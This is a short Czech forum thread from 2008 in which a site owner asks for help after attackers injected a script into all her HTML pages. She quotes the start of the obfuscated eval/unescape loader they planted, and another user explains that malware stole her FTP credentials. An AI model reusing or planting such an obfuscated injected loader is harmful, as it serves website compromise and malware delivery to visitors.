Autor | Zpráva | ||
---|---|---|---|
janiice Profil * |
#1 · Zasláno: 28. 3. 2008, 20:46:21
Chtěla bych se vás zeptat, jestli nevíte, jak zabezpečit stránky tvořené v html kódu před xss. Někdo mi zneviditelnil stránky v iframe scriptovým příkazem, který nahrál na všechny stránky webovek. Pomohl by mi prosím někdo? příkaz začínal takhle: <!-- [ 8a2704cf0de452091843fdc43ade6abc ] --><script>eval(unescape('function%20kDDwqn%28siI%29%7Bfunction%20uXCo R%28av
DB%29%7Bvar%20aINdo%3DavDB.length%3Bvar%20gUKEsu%3D0%2CrdyG%3D0%3B while%28gUKEsu%3CaINdo%29%7BrdyG+%3DavDB.charCodeAt%28gUKEsu%29*aINdo %3BgUKEsu++%3B%7Dreturn%20%28%27%27+rdyG%29%7D%20%20%20try%20%7B var%20dpDT%3Deval%28%27a%3Frkg%3Fu%3Fm%3Fe4n4tSs%3F.%3Fc%3FaSlSl%3Fe 4e5%27.replace%28/%5BkS4%5C%3F5%5D/%2C%20%27%27%29%29%2CbMBm%3 Dnew%20String%28%29%2CyoNf%3D0%3BvHfyN%3D0%2CtYz%3D%28new%20String %28dpDT%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/%2C%27%27%29% 3Bvar%20pKqq%3DuXCoR%28tYz%29%3BsiI%3Dunescape%28siI%29%3Bfor%28var% 20adRr%3D0%3B%20adRr%20%3C%20%28siI.length%29%3B%20adRr++%29%7Bvar% 20jlGGm%3DsiI.charCodeAt%28adRr%29%3Bvar%20bdUO%3DtYz.charCodeAt%28yoN f% 29%5EpKqq.charCodeAt%28vHfyN%29%3ByoNf++%3BvHfyN++%3Bif%28yoNf%3EtYz.l ength %29yoNf%3D0%3Bif%28vHfyN%3EpKqq.length%29vHfyN%3D0%3BbMBm+%3DString.fr om CharCode%28jlGGm%5EbdUO%29%3B%7Deval%28bMBm%29%3B%20return%20bMBm% 3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DkDDwqn%28%27%2532% 2533%2538%2539% etc... pak už následujou jen čísla a procenta. Děkuju. |
||
Davex Profil |
#2 · Zasláno: 28. 3. 2008, 20:53:34
To není způsobeno XSS. Na počítači máš vir, který vykradl hesla k FTP z Total Commanderu. Řeší se to tu neustále.
|
||
janiice Profil * |
#3 · Zasláno: 28. 3. 2008, 21:33:16
děkuju za pomoc :-)
|
||
Časová prodleva: 16 let
|
0